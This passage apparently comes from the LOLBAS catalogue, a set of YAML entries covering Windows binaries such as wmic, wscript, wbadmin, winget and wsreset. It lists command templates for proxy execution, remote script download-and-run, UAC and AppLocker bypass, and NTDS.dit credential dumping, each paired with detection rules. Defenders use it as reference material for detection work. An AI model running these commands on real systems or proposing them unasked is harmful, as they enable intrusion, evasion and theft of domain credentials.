'%ProgramW6432%\wmpnscfg.exe'. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10 Tags: - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP` Resources: - Link: https://twitter.com/notwhickey/status/1466588365336293385 Acknowledgement: - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: yml/OSBinaries/Vbc.yml ================================================ --- Name: vbc.exe Description: Binary file used for compile vbs code Author: Lior Adar Created: 2020-02-27 Commands: - Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar - Person: Hai Vaknin(Lux) ================================================ FILE: yml/OSBinaries/Verclsid.yml ================================================ --- Name: Verclsid.exe Description: Used to verify a COM object before it is instantiated by Windows Explorer Author: '@bohops' Created: 2018-12-04 Commands: - Command: verclsid.exe /S /C {CLSID} Description: Used to verify a COM object before it is instantiated by Windows Explorer Usecase: Run a COM object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml Resources: - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ Acknowledgement: - Person: Nick Tyrer Handle: '@NickTyrer' ================================================ FILE: yml/OSBinaries/Wab.yml ================================================ --- Name: Wab.exe Description: Windows address book manager Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: wab.exe Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice Usecase: Execute dll file. Bypass defensive counter measures Category: Execute Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml - IOC: WAB.exe should normally never be used Resources: - Link: https://twitter.com/Hexacorn/status/991447379864932352 - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ Acknowledgement: - Person: Adam Handle: '@Hexacorn' ================================================ FILE: yml/OSBinaries/Wbadmin.yml ================================================ --- Name: wbadmin.exe Description: Windows Backup Administration utility Author: Chris Eastwood Created: 2024-04-05 Commands: - Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx) Usecase: Snapshoting of Active Directory NTDS.dit database Category: Dump Privileges: Administrator, Backup Operators, SeBackupPrivilege MitreID: T1003.003 OperatingSystem: Windows Server - Command: wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers. Usecase: Dumping of Active Directory NTDS.dit database Category: Dump Privileges: Administrator, Backup Operators, SeBackupPrivilege MitreID: T1003.003 OperatingSystem: Windows Server Full_Path: - Path: C:\Windows\System32\wbadmin.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit" Resources: - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 ================================================ FILE: yml/OSBinaries/Wbemtest.yml ================================================ --- Name: wbemtest.exe Description: WMI/WBEM Test Binary Author: saulpanders Created: 2025-04-22 Commands: - Command: wbemtest.exe Description: Execute arbitary commands through WMI through a GUI managment interface for Web Based Enterprise Management testing (WBEM). Uses WMI to Create and instance of a Win32_Process WMI class with a commandline argument of the target command to spawn. Spawns a GUI so it requires interactive access. For a demo, see link to blog in resources. Usecase: Execute arbitrary commands through WMI classes Category: Execute Privileges: Any MitreID: T1047 OperatingSystem: Windows 10, Windows 11 Tags: - Application: GUI - Execute: CMD Full_Path: - Path: c:\windows\system32\wbem\wbemtest.exe Detection: - IOC: wbemtest.exe binary spawned Resources: - Link: https://saulpanders.github.io/2025/01/20/lolbas-wbemtest.html Acknowledgement: - Person: Paul Sanders Handle: '@saulpanders' ================================================ FILE: yml/OSBinaries/Winget.yml ================================================ --- Name: winget.exe Description: Windows Package Manager tool Author: Paul Sanders Created: 2022-01-03 Commands: - Command: winget.exe install --manifest {PATH:.yml} Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`' Usecase: Download and execute an arbitrary file from the internet Category: Execute Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Remote - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore {name or ID} Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: winget.exe install --accept-package-agreements -s msstore {name or ID} Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine Category: AWL Bypass Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe Code_Sample: - Code: https://gist.github.com/saulpanders/00e1177602a8c01a3a8bfa932b3886b0 Detection: - IOC: winget.exe spawned with local manifest file - IOC: Sysmon Event ID 1 - Process Creation - Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml Resources: - Link: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html - Link: https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended - Link: https://www.youtube.com/watch?v=zuL7x4Wltto Acknowledgement: - Person: Paul Handle: '@saulpanders' - Person: Konrad 'unrooted' Klawikowski - Person: Fredrik H. Brathen ================================================ FILE: yml/OSBinaries/Wlrmdr.yml ================================================ --- Name: Wlrmdr.exe Description: Windows Logon Reminder executable Author: Moshe Kaplan Created: 2022-02-16 Commands: - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}" Description: Execute executable with wlrmdr.exe as parent process Usecase: Use wlrmdr as a proxy binary to evade defensive countermeasures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml - IOC: wlrmdr.exe spawning any new processes Resources: - Link: https://twitter.com/0gtweet/status/1493963591745220608 - Link: https://twitter.com/Oddvarmoe/status/927437787242090496 - Link: https://twitter.com/falsneg/status/1461625526640992260 - Link: https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw Acknowledgement: - Person: Grzegorz Tworek Handle: '@0gtweet' - Person: Oddvar Moe Handle: '@Oddvarmoe' - Person: Freddy Handle: '@falsneg' ================================================ FILE: yml/OSBinaries/Wmic.yml ================================================ --- Name: Wmic.exe Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: wmic.exe process call create "{PATH_ABSOLUTE}:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Command: wmic.exe process call create "{CMD}" Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "{CMD}" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - Execute: Remote - Command: wmic.exe process get brief /format:"{REMOTEURL:.xsl}" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: XSL - Execute: Remote - Command: wmic.exe process get brief /format:"{PATH_SMB:.xsl}" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: XSL - Execute: Remote - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe" Description: Copy file from source to destination. Usecase: Copy file. Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Wmic retrieving scripts from remote system/Internet location - IOC: DotNet CLR libraries loaded into wmic.exe - IOC: DotNet CLR Usage Log - wmic.exe.log - IOC: wmiprvse.exe writing files Resources: - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html - Link: https://twitter.com/subTee/status/986234811944648707 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OSBinaries/WorkFolders.yml ================================================ --- Name: WorkFolders.exe Description: Work Folders Author: Elliot Killick Created: 2021-08-16 Commands: - Command: WorkFolders Description: Execute `control.exe` in the current working directory Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Rename - Command: WorkFolders Description: '`WorkFolders` attempts to execute `control.exe`. By modifying the default value of the App Paths registry key for `control.exe` in `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe`, an attacker can achieve proxy execution.' Usecase: Proxy execution of a malicious payload via App Paths registry hijacking. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Requires: Registry change Full_Path: - Path: C:\Windows\System32\WorkFolders.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml - IOC: WorkFolders.exe should not be run on a normal workstation - IOC: Registry modification to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe Resources: - Link: https://www.ctus.io/2021/04/12/exploading/ - Link: https://twitter.com/ElliotKillick/status/1449812843772227588 Acknowledgement: - Person: John Carroll Handle: '@YoSignals' - Person: Elliot Killick Handle: '@elliotkillick' - Person: Naor Evgi Handle: '@ghosts621' ================================================ FILE: yml/OSBinaries/Wscript.yml ================================================ --- Name: Wscript.exe Description: Used by Windows to execute scripts Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: wscript //e:vbscript {PATH}:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - Command: echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: Wscript.exe executing code from alternate data streams - IOC: DotNet CLR libraries loaded into wscript.exe - IOC: DotNet CLR Usage Log - wscript.exe.log Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: SaiLay(valen) Handle: '@404death' ================================================ FILE: yml/OSBinaries/Wsreset.yml ================================================ --- Name: Wsreset.exe Description: Used to reset Windows Store settings according to its manifest file Author: Oddvar Moe Created: 2019-03-18 Commands: - Command: wsreset.exe Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wsreset.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml# - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen Resources: - Link: https://www.activecyber.us/activelabs/windows-uac-bypass - Link: https://twitter.com/ihack4falafel/status/1106644790114947073 - Link: https://github.com/hfiref0x/UACME/blob/master/README.md Acknowledgement: - Person: Hashim Jawad Handle: '@ihack4falafel' ================================================ FILE: yml/OSBinaries/Wuauclt.yml ================================================ --- Name: wuauclt.exe Description: Windows Update Client Author: David Middlehurst Created: 2020-09-23 Commands: - Command: wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer Description: Loads and executes DLL code on attach. Usecase: Execute dll via attach/detach methods Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 Tags: - Execute: DLL Full_Path: - Path: C:\Windows\System32\wuauclt.exe - Path: C:\Windows\UUS\amd64\wuauclt.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml - IOC: wuauclt run with a parameter of a DLL path - IOC: Suspicious wuauclt Internet/network connections Resources: - Link: https://dtm.uk/wuauclt/ Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ================================================ FILE: yml/OSBinaries/Xwizard.yml ================================================ --- Name: Xwizard.exe Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. Usecase: Run a com object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: COM - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Usecase: Run a com object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: COM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL} Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml Resources: - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ - Link: https://twitter.com/notwhickey/status/1306023056847110144 Acknowledgement: - Person: Adam Handle: '@Hexacorn' - Person: Nick Tyrer Handle: '@NickTyrer' - Person: harr0ey Handle: '@harr0ey' - Person: Wade Hickey Handle: '@notwhickey' ================================================ FILE: yml/OSBinaries/msedge_proxy.yml ================================================ --- Name: msedge_proxy.exe Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml Acknowledgement: - Person: Mert Daş Handle: '@merterpreter' ================================================ FILE: yml/OSBinaries/msedgewebview2.yml ================================================ --- Name: msedgewebview2.exe Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content. Author: Matan Bahar Created: 2023-06-15 Commands: - Command: msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: Low privileges MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - Command: msedgewebview2.exe --utility-cmd-prefix="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="{CMD}" Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess. Usecase: Proxy execution of binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\131.0.2903.70\msedgewebview2.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml - IOC: 'msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path' Resources: - Link: https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf Acknowledgement: - Person: Uriel Kosayev Handle: '@MalFuzzer' - Person: Hai Vaknin Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@Tamirye94' - Person: Matan Bahar Handle: '@Bl4ckShad3' ================================================ FILE: yml/OSBinaries/odbcad32.yml ================================================ --- Name: odbcad32.exe Description: ODBC Data Source Administrator to manage User/System DSNs and ODBC drivers. Author: 'Ekitji' Created: 2025-09-04 Commands: - Command: odbcad32.exe Description: Launch odbcad32.exe GUI, click 'Tracing' tab, click 'Browsing' button, enter abitrary command in the File Dialog's path, press enter. Usecase: Execute a binary as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD - Application: GUI Full_Path: - Path: c:\windows\system32\odbcad32.exe - Path: c:\windows\syswow64\odbcad32.exe Detection: - IOC: odbcad32.exe spawning unexpected child processes. Resources: - Link: https://medium.com/@thebinaryhashira/living-off-the-land-and-living-above-uac-6a66738d225c Acknowledgement: - Person: amonitoring - Person: Ekitji Handle: '@eki_erk' ================================================ FILE: yml/OSBinaries/write.yml ================================================ --- Name: write.exe Description: 'Windows Write' Author: Michal Belzak Created: 2025-06-17 Commands: - Command: write.exe Description: 'Executes a binary provided in default value of `HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\wordpad.exe`.' Usecase: Execute binary through legitimate proxy. This might be utilized to confuse detection solutions that rely on parent-child relationships. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11 (before 24H2) Tags: - Execute: EXE - Requires: Registry Change Full_Path: - Path: 'C:\Windows\write.exe' - 